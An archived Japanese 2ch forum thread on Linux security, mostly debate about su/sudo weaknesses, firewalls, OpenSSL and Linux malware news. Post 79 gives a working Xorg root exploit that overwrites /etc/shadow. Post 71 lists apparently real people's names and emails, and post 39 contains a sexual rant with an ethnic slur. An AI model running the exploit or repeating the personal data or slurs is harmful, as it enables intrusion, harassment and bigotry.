探検
Linuxセキュリティ総合スレ [無断転載禁止]©2ch.net
0002login:Penguin
2016/06/12(日) 23:38:08.55ID:yP8FUEwn0003login:Penguin
2016/06/13(月) 06:09:27.32ID:eDU8tci10004login:Penguin
2016/06/13(月) 10:29:04.09ID:Oh9pGuME0005login:Penguin
2016/06/13(月) 11:01:38.26ID:2M58TAyx0006login:Penguin
2016/06/13(月) 11:57:17.29ID:J1aqrsrp0007login:Penguin
2016/06/13(月) 12:21:18.30ID:8nJEuh/y0008login:Penguin
2016/06/13(月) 15:37:47.75ID:0TZsX1cx0009login:Penguin
2016/06/13(月) 20:55:43.29ID:j5ciL7QT0010login:Penguin
2016/06/13(月) 22:05:23.35ID:Qr5Zi0oD0011login:Penguin
2016/06/13(月) 22:14:04.99ID:K9ELyhAn最近nftに移行はしたけど、iptableで指定した項目が全て移せたわけではないな〜。
0012login:Penguin
2016/06/13(月) 22:30:22.37ID:THPCncF9http://hayabusa6.2ch.net/test/read.cgi/linux/1150732249/
0013login:Penguin
2016/06/20(月) 09:45:44.94ID:EE0G5RY50014login:Penguin
2016/06/27(月) 21:17:47.20ID:1MSZfZlD0015login:Penguin
2016/07/08(金) 22:16:34.93ID:nKTBpDXx0016login:Penguin
2016/07/11(月) 20:45:28.85ID:1UAhQw4h/ つ⊂ \ 怖いー
0017login:Penguin
2016/07/16(土) 12:23:29.36ID:az2Lvjtg0018login:Penguin
2016/07/28(木) 14:39:09.27ID:vgMn1AfM被害が少ないのはただ単に狙われてないからってだけ。
1.su/sudoが糞
glibcの脆弱性GHOSTの発見に関わった人のコメント
http://www.openwall.com/lists/owl-users/2004/10/22/2
> If it would be permitted for a non-root user to su to root, then anyone who could have compromised the user's account[1] would also be able to hijack a su session[2] and then su to root himself.
> [1] Such a compromise could occur in a variety of ways: Web/FTP/etc.
> client vulnerabilities, password snooping, etc.
> [2] For example, edit the user's shell startup scripts to make su an alias for a custom su wrapper program.
http://www.openwall.com/lists/owl-users/2004/10/20/6
> unfortunately both su and sudo are subtly but fundamentally flawed.
> So the separation between the non-root and the root accounts is lost.
suやsudoを使える非rootのアカウントが攻撃者に侵入された時点で、攻撃者はそのアカウントの~/.bashrcなどにパスワードを盗むラッパーを実際のsu/sudoのaliasやfunctionとして仕込んだり出来る。
次に正規のユーザーがsu/sudoを使おうとすると攻撃者の仕込んだラッパーが実行され攻撃者はパスワードを得ることが出来、あとは攻撃者もsu/sudoを使い放題となる。
結果としてこれらのツールのせいでrootと非rootというユーザーの分離という一番基本的なセキュリティさえ無意味になっている。
0019login:Penguin
2016/07/29(金) 08:18:56.26ID:3v5CyHDC0020login:Penguin
2016/07/29(金) 11:43:36.67ID:c3kWqYGYでもw10こわいわー
0021login:Penguin
2016/07/29(金) 12:00:07.41ID:r5rsVV/0侵入された時点でおしまいだろうに何言ってんだこいつって感じですかね。
0022login:Penguin
2016/07/29(金) 15:11:35.83ID:2cIkyZpH今の時代は「侵入された時点でおしまい」が許されないからこそブラウザとかはseccompやnamespaceを駆使して仮に脆弱性経由で何かコードが実行されても被害を最小限に食い止めるようにsandbox化に力を入れてたりするんだが
そもそもそれが許されるなら、一人で使うデスクトップ用途ではUbuntuみたいなわざわざ「普段非rootでログインして必要な時だけsu/sudoでrootになって実行する」
っていう行動にはセキュリティ的には何の意味もない、最初からrootでログインしてそのままエロサイト巡りしても何ら問題ないって事になるのは理解できるか?
もっとも昔はそれでも問題ないレベルだったのでWindowsではAdministratorでのログインがデフォになってたわけだが
そのあたりをきちんと理解しないで「Unix/LinuxはWindowsよりセキュアなんですーー」で思考停止してる馬鹿が大多数のせいで今の現状があるわけだ
その間にWindowsは、UACのように権限を得るためにはきちんとそれぞれへの入出力の機密性やコマンド自身の完全性をきちんと確保して「異アカウント間の分離」を破壊しないように考慮したり、
ILのように同アカウント内でもきちんとプロセス間を分離して保護(これは>>19の言うように強制アクセス制御で"一部"は解決できる)することでよりセキュアに進化した
一方残念ながら思考停止したUnix/Linuxは、権限を得るために「何の保護もない環境」から実行される「何の保護もされてないsu/sudoコマンド」に対して「何の保護もされてない状態でパスワードを入力する事」状態が放置され、
その一番基本的な「異アカウント間の分離」すら無意味になってる体たらく
結果的に「(sudoが使える非rootユーザーが)侵入された時点で(システム全体が)おしまい」になってるので、一周回ってお前の言ってることも正解なわけだがな
0023login:Penguin
2016/07/29(金) 15:40:50.53ID:2cIkyZpHきちんと設定されてなかったり(互換性のせいで出来ない)、ユーザーランドが糞の寄せ集めなせいで台無しだが
0024login:Penguin
2016/07/29(金) 16:57:07.30ID:AresjTJd卑近なって言ってもあなたの身近な人じゃなくてネットで皆の目に触れるようなブログやフォーラムでいいんだ。
xpが終わる時にデスクトップLinuxがって騒いでから、Linuxといえどのほほんとしてられないってのはみんな思ってることなんだ。
だから知りたいのは、いかに危険か、ではなく、危険なブツに出くわした時にどうすべきか、出くわした人はどう対処したか、なんだよ。
開発に携わった人のブログやコラム見つけて危険だ危険だって焚き付けるのなんて思考停止してもできることだろ?
LinuxユーザーがWindowsは危険だと騒ぐのが思考停止ならWindowsユーザーがLinuxは危険だと騒ぐのもまた思考停止じゃないの?対策を示すとか何かしない限り。
まるで、ゲームのバグを見つけたからプランナーや開発者より自分の方が優秀だって威張ってるデバッガーみたいだよ君は。
0025login:Penguin
2016/07/29(金) 17:23:02.18ID:2cIkyZpH俺みたいなゴミクズには解決する力も政治力もないから2chみたいな掃き溜めでグチってんのよ
Linux好きだから改善してほしいし、もし同じように問題だと感じる人が増えてくれれば改善される可能性も増すしね
そのために敢えて居丈高にLinuxに厳しくWindowsに甘く書いたんだ、ゴメン(´・ω・`)
0026login:Penguin
2016/07/29(金) 17:53:59.24ID:53ApPnD4あることするには続きは窓操作も必要だからじゃね?(あるいは暗号のようなパス書かないと辿れないとか)
そういう不便さを有難くセキュリティーが強いというのかどうか
0027login:Penguin
2016/07/29(金) 19:36:23.87ID:IWyIiLvv0028login:Penguin
2016/07/29(金) 21:02:48.88ID:2cIkyZpHKDEの開発の人とかちゃんといまのXやシェルとかの実行環境には問題があることを認めてどうしたら良いか考えてる人もいるんだよなー
でも自分の開発してるソフトウェアだけが対応してもshellとかの他のソフトウェアのせいでそれが無意味になっちゃったりで困ってる
0029login:Penguin
2016/07/30(土) 13:47:31.26ID:m4BHHueFそれと、強制アクセス制御のステータスってのは何らかのファイルにロギングされんの?
0030login:Penguin
2016/07/30(土) 13:54:08.97ID:m4BHHueFノーガードきめこんで運用してたら、そりゃあ狙われた時に簡単にクラッシュしますがな。
(肝心な釘打ち無しで構築してるもんだから)
Windowsの世界ではねセキュリティソフト入れて丸投げしてるわけ。
但し、ユーザーの中には変わり者がいて、ノーガードな奴もいる訳、
まあ、他人ごとでどうなろうが知ったことじゃないが…
0031login:Penguin
2016/08/13(土) 02:05:03.68ID:oD+tGgzqhttp://www.itmedia.co.jp/enterprise/articles/1608/12/news047.html
0032login:Penguin
2016/08/13(土) 04:51:41.40ID:aN9vHd6iすぐ更新されるから慌てなさんな
0033login:Penguin
2016/08/13(土) 08:48:05.17ID:TXBKXjH82012年からあった脆弱性がすぐに修正されるの?
0034login:Penguin
2016/08/13(土) 08:55:27.99ID:1K0xoI1z0035login:Penguin
2016/08/13(土) 11:19:12.09ID:UrcrvCqb修正が難しいわけじゃないのだろう。
0036login:Penguin
2016/08/14(日) 13:17:03.39ID:gduCaAAfだろ
0037login:Penguin
2016/08/14(日) 14:21:25.00ID:IM019vfG0038login:Penguin
2016/08/14(日) 18:52:10.23ID:fe3iWrgq自分で確認したら?ガバガバだから。ただし、法令違反で引っ張られないように工夫しろよ。
官公庁はWindows serverじゃないの?
0039login:Penguin
2016/09/03(土) 02:42:39.64ID:T3i7Gd65なんで飲み行かないの?
なんで女の子誘って飲みに行かないの?
声掛けないと飲みいけないのに。
話しないと恋は始まらないよ。
声掛けないとSEXもさせてくれないのに。
声掛けないから、
ヤンキーみたいなオジサンが誘いだして大きなこと言って、不倫してるよ。
女の子誘って飲みにきなよ。
女の子に声掛けないと、恋も出来ないよ。
SEXしたかったら、声掛けて飲みに行きなよ。
残業してる間に、持っていかれちゃってるよ。
後ろから見たら、がに股になってる女の子見たことない?
SEXしたかったら、なんでもいいから声掛けて飲みに行きなよ。
残業しても恋はできないよ。SEXできないよ。
恋をしなけりゃ、SEXはさせてもらえない。
恋をするには、話して気に入ってもらうしかない。
気に入ってもらうには、飲み行くのが近道だろ。
別に会議で、大きな事言ってもいいけど。
どうせSEX出来るまで何度も繰り返すんだろうから、
そのうち年配の方々にめんどくさがられて、遠くに飛ばされるよ。
そんなだったら、飲みに行くのが一番だろ。
別にがに股のさせこちゃんを探して、お願いしてみてもいいけど。
ばれたとき、周りの目が厳しいぞ。
お前が呼ばないから、ほらみろ可愛い子はみんなやられて。
残っているのはブスばかりになってるじゃないか。
ブスはキツイぞ。
誘えないなら、韓国人でも買えよ。みんなそうしてるぞ。
0040login:Penguin
2016/09/06(火) 16:46:15.64ID:vVf8gi4f0041login:Penguin
2016/09/06(火) 22:53:44.42ID:TopTMWtnなんでよ?シスコ様だぞ?
0042login:Penguin
2016/09/07(水) 07:09:59.88ID:O110MSh/0043login:Penguin
2016/09/13(火) 10:37:58.85ID:g0CBlyhH0044login:Penguin
2016/09/17(土) 18:12:13.92ID:9GLGaOH40045login:Penguin
2016/09/29(木) 12:32:01.60ID:ZwQJlT8x0046login:Penguin
2016/09/29(木) 12:44:59.58ID:5wiRFmuo0047login:Penguin
2016/09/29(木) 12:54:29.04ID:lvJNOdKb0048login:Penguin
2016/09/29(木) 20:57:19.24ID:SWTYFo2r0049login:Penguin
2016/10/04(火) 17:05:57.73ID:ZgAPWl/3乗り換えると最強になるの?
0050login:Penguin
2016/10/04(火) 21:10:03.74ID:MfnjwfuN0051login:Penguin
2016/10/23(日) 10:01:10.29ID:PWQ2IPcX出て行く通信のフィルタを書くためには
結局IPTABLES書かなきゃいけないのはなおった?
なおったなら乗り換える。
0052login:Penguin
2016/11/30(水) 12:37:43.41ID:SfHGIzEu(´・ω・) < おっかのうえひっなげしのはぁながぁぁ 〜
(U )
`u-u´
0053login:Penguin
2017/01/20(金) 17:47:06.69ID:OITYnSWZ(\ ∞ ノ
ヽ)_ノ 迫る〜パンチ〜〜♪
(=O┬O
◎-ヽJ┴◎ キキ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
0054login:Penguin
2017/02/01(水) 08:09:39.67ID:gwo76No6(´・ω・`) 迫る〜ハゲッ♪
(=O┬O
◎-ヽJ┴◎ キキ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
0055login:Penguin
2017/02/13(月) 20:59:43.28ID:aKHZLuDZ0056login:Penguin
2017/03/08(水) 21:47:52.30ID:TuQ4x/Y7.ミ,,・_・ミ 迫る〜ハゲッ♪
(=O┬O
◎-ヽJ┴◎ キキ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
0057login:Penguin
2017/04/19(水) 13:43:38.91ID:kexeXY6M0058login:Penguin
2017/04/28(金) 16:59:33.55ID:ZiXyj8JT過去の話なんすね。それなのに未だにLinuxを
安全って紹介してる所ばかりなのは何でですかね
0059login:Penguin
2017/04/30(日) 00:21:15.39ID:zhwkJ+1uWindowsでは散々あるけど
0060login:Penguin
2017/04/30(日) 00:36:51.26ID:3yi8UZQK0061login:Penguin
2017/04/30(日) 14:38:15.54ID:6nvs6+SR0062login:Penguin
2017/04/30(日) 19:21:48.33ID:K1kIRV9aマシンの使用用途によりけりだとは思いますが、
僕の自宅鯖はfail2banだけです。
有用な物や便利な物があれば教えて欲しいです。
0063login:Penguin
2017/05/09(火) 10:29:04.72ID:6kIUOBHa今までosの脆弱性突かれてどうこうてのは
無いなあ
過去10年起きたのは、全てユーザーの問題
クソみたいなパスワード突破されたとか、
ゴミみたいなコードからのインジェクションとかのみ
0064login:Penguin
2017/06/16(金) 09:15:27.82ID:Cv6QgGNP0065login:Penguin
2017/06/16(金) 09:16:10.27ID:Cv6QgGNP0066login:Penguin
2017/07/03(月) 23:36:13.34ID:cDHqg+NIで暗号化してたファイルが、急に、
openssl enc -d 〜
で開けなくなりました。
ファイルが壊れたかとめちゃくちゃ焦ったけど、
タイムスタンプは去年のまま変化なし。
本家から、1.0.2lを落としてコンパイルした実行ファイルからだと
問題なく開けたからファイルの問題ではない模様。
1.1.0のバグですか?
#確か2ヶ月前ぐらいだとパッケージインストールされている
1.1.0系でも問題なかったはずですが。
linux-mint(ubuntu16.04)です。
0067login:Penguin
2017/07/04(火) 01:23:11.94ID:RdyHvcf/くだらねえ質問はここに書き込め!Part 228
http://hayabusa6.2ch.net/test/read.cgi/linux/1494314571/
で聞いたほうが良いと思う
006866
2017/07/05(水) 00:22:13.88ID:uEgHtGC3ありがとう。
次回からそうするわ。
ちなみに、今回のは下記参考に自己解決したっぽい。
-md md5付けたら、現行1.1.0でもファイル開けました。
https://github.com/fastlane/fastlane/issues/9542
https://unix.stackexchange.com/questions/344150/why-can-one-box-decrypt-a-file-with-openssl-but-another-one-cant
0069login:Penguin
2017/09/07(木) 19:37:24.22ID:NhVQ+S22全くセキュリティーパッチを充てていないrhel6.1で、poodle対策をしなきゃいけないんだが、
設定変更だけで対処する場合は、ssl.confのcipherのところに -sslv3入れるだけで良い?
0070login:Penguin
2017/10/16(月) 19:17:31.78ID:AvEU8VfP_,,..,,,,_
/ ,' 3/⌒ヽ-、_
/l. /____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄
0071login:Penguin
2017/11/03(金) 21:09:20.77ID:UMEHXcXhセキュリティの基本は尖らないこと、目立たないこと。隠すこと。 バカ。
新名主 隆志 TIS shimmyozu.takashi@technopro.com
色田 眞吾 日立製作所 Shikita.Shingo@technopro.com
八木 一暢 TIS yagi.kazunobu@technopro.com
水野 潤 ハマゴムエイコム Mizuno.Jun@technopro.com
佐々木 優也 (首都圏第1支店案件) sasaki.yuya@technopro.com
佐々木 健太 日立製作所 sasaki.kenta@technopro.com
中野 洋行 NSSLCサービス Nakano.Hiroyuki@technopro.com
永井 真祐子 富士ソフト nagai.mayuko@technopro.com
品川区高輪3-25-33
都内のトイレに花子さんだ
日立の末端は、ただの派遣会社だからな。メーカーはどこも一緒か。。
0072login:Penguin
2017/12/29(金) 13:14:18.48ID:S/CsVkMC参考までに、
⇒ 『宮本のゴウリエセレレ』 というブログで見ることができるらしいです。
グーグル検索⇒『宮本のゴウリエセレレ』
HRT6GIPYTB
0073login:Penguin
2018/04/11(水) 07:03:34.17ID:9VtMkuZE_,,..,,,,_
/ ,' 3/⌒ヽ-、_
/l. /____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄
0074login:Penguin
2018/05/22(火) 11:10:27.97ID:Czl6p0FW関心がある人だけ見てください。
グーグルで検索するといいかも『ネットで稼ぐ方法 モニアレフヌノ』
BTBIK
0075login:Penguin
2018/05/26(土) 09:20:44.99ID:c6Ml0Dodhttp://hayabusa9.2ch.net/test/read.cgi/news/1527149278/l50
0076login:Penguin
2018/05/26(土) 12:43:59.58ID:H0+abEbN0077login:Penguin
2018/05/27(日) 16:31:34.31ID:QzfBv+yQ0078login:Penguin
2018/07/08(日) 20:50:42.96ID:QTYf4jMn_,,..,,,,_
/ ,' 3/⌒ヽ-、_
/l. /____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄
0079login:Penguin
2018/10/31(水) 11:46:41.86ID:XLo7vX23https://www.exploit-db.com/exploits/45697/
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
xorgはフォントパスのリストをそのままログに書き込むことを利用してる
(shadowが上書きされるので試すならshadowのバックアップを取ってからどうぞ)
0080login:Penguin
2019/03/10(日) 12:39:41.95ID:BHkfBLF0| 8 )
∧,,,∧∩-''"
_ ..(´・ω・`)彡 おぱんつ おぱんつ ! !
〃(\ ∞ ,⊂彡
`ヽ)_ノ| |
し⌒J
0081login:Penguin
2019/05/24(金) 01:31:09.68ID:WQ5DwMzT( ´ ・ω・) 呼んだ ?
0082login:Penguin
2019/05/31(金) 12:30:43.06ID:bdQbsGXYhttps://news.mynavi.jp/article/20190531-833791/
Intezerは5月19日(米国時間)、Linuxシステムを標的とした新しいマルウェア「HiddenWasp」を
発見したと「Intezer - HiddenWasp Malware Stings Targeted Linux Systems」で伝えた。
このマルウェアは現在も活動を継続しており、主要なアンチウィルスシステムで検出することが
できないと指摘されている。発見されたHiddenWaspの主な特徴は以下の通り。
・Linuxマルウェアの多くは仮想通貨マイニングやDDoS攻撃に焦点を当てているが、HiddenWasp
は異なっている。HiddenWaspはトロイの木馬として設計されており、標的のシステムを純粋に
リモートコントロールするために開発されている
・HiddenWaspに感染しているユーザーはすでに標的型攻撃のターゲットになっている可能性が
高い
・HiddenWaspはMiraiやAzazelルートキットといった入手可能なオープンソース・マルウェア
から大量のソースコードが流用されている
・HiddenWaspは中国のマルウェアファミリーに強い類似性があるものの、帰属に関しては可能
性が低いと見られる
Intezerは、Linuxを標的としたマルウェアは時間の経過とともにますます複雑になり続けている
と指摘。現在、一般的な脅威でも検出率があまり高くないが、より高度な脅威はさらに検出率が
低いという。今後、Linuxを標的としたマルウェアはさらに検出が難しくなるおそれがあり、
注意が必要。
0083login:Penguin
2019/06/01(土) 00:37:42.11ID:/N3jDoCjこれはひどい
俺が唯一Linuxに移行できない理由がアンチウイルスソフトだからな
Windowsのノートンみたいに完璧なのがあれば、ノートン一つで完全に防げるけど、
Linuxにはこれがないからな
SophosAntiVirusがあるが、なぜか定義ファイルの更新が20日異常ないぞ(気のせい?)
RKHunter、Tripwire、Lynis、Firewallとかだけとかありえんだろ?
0084login:Penguin
2019/06/01(土) 03:51:20.70ID:BeN0lDY7レスを投稿する
ニュース
- 【レポート】日本人の半数以上「生活が苦しい」…「日本人の所得・200万円台が最多」のキツい実態… [BFU★]
- 水原容疑者、日本に強制送還される見込み…米メディア報道 [おっさん友の会★]
- 【自動車】「国産ワゴン」なぜ衰退? わずか4車種に減少! 絶滅寸前でも「やっぱりワゴンが一番!」の声も!? 反響は? [尺アジ★]
- 原爆投下「戦争止めた」 米国防長官、議会で見解 ★2 [蚤の市★]
- 元〝環境少女〟グレタ・トゥーンベリさんが警察の命令に従わなかったとして罰金刑 スウェーデン [少考さん★]
- 「高学歴&イケメンだけがスペードのエースになれる」いなば食品の女帝が作らせた"容姿&学歴差別トランプ" [おっさん友の会★]
- 識者「工場畜産は人類最悪の発明畜産やめてビーガンになる奴ってどういうきっかけなん?」
- ヴィーガン「動物を食べる動物をどう思っとるんやろ」
- 【朗報】全国のパパ活・水商売女たち、ガチで震え上がる★2 [389296376]
- 🏡 🏡 🏡
 🏡 🏡住宅街
🏡 🏡
- 【悲報】西新宿刺殺おぢ、死刑でほぼ確定か「判例から考えると極刑は免れない」 [963243619]
- 女「結婚したいなら3000万用意して」おじ「はい3000万」女「ありがと、もう来るなよストーカー」おじ「…殺すか」どうすればいいのこれ [931948549]